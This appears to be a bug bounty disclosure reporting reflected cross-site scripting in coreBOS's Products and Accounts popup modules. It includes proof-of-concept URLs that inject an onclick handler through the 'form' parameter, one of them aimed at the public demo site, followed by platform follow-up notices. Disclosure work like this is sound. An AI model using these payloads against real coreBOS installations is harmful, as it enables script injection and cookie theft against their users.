Reflected XSS on the Products Modules in tsolucio/corebos
Valid
Reported on
Jun 25th 2022
Description
coreBOS is vulnerable with Reflected XSS on the Products modules. The HTML tag can be escaped with " character and the attacker can be able to perform the Reflected XSS
Proof of Concept
- Login to coreBOS
- Go to
http://localhost:8888/corebos/index.php?module=Products&action=Popup&html=Popup_picker&form=rel=%22canonical%22+accesskey=%22X%22+onclick=%22alert(1)%22xxx&forfield=product_id&srcmodule=Campaigns&forrecord=
Or:
http://localhost:8888/corebos/index.php?module=Accounts&action=Popup&popuptype=specific_account_address&form=rel=%22canonical%22+accesskey=%22X%22+onclick=%22alert(1)%22xxx&form_submit=false&fromlink=
- (Press ALT+SHIFT+X on Windows) (CTRL+ALT+X on OS X)
Impact
The impact of this vulnerability is the attacker can be able to execute the javascript script on the webapps and can be able to steal cookie as an example.
References
We are processing your report and will contact the
tsolucio/corebos
team within 24 hours.
a year ago
Hi Team,
To easily reproduce the issue you can go to:
https://demo.corebos.com/index.php?module=Products&action=Popup&html=Popup_picker&form=rel=%22canonical%22+accesskey=%22X%22+onclick=%22alert(document.domain)%22xxx&forfield=product_id&srcmodule=Campaigns&forrecord=
and then (Press ALT+SHIFT+X on Windows) or (CTRL+ALT+X on OS X)
Thanks, @apapedulimu
Nosa Shandy modified the report
a year ago
We have contacted a member of the
tsolucio/corebos
team and are waiting to hear back
a year ago
We have sent a
follow up to the
tsolucio/corebos
team.
We will try again in 7 days.
a year ago
We have sent a
second
follow up to the
tsolucio/corebos
team.
We will try again in 10 days.
a year ago
We have sent a
third and final
follow up to the
tsolucio/corebos
team.
This report is now considered stale.
a year ago
The researcher's credibility has increased: +7
to join this conversation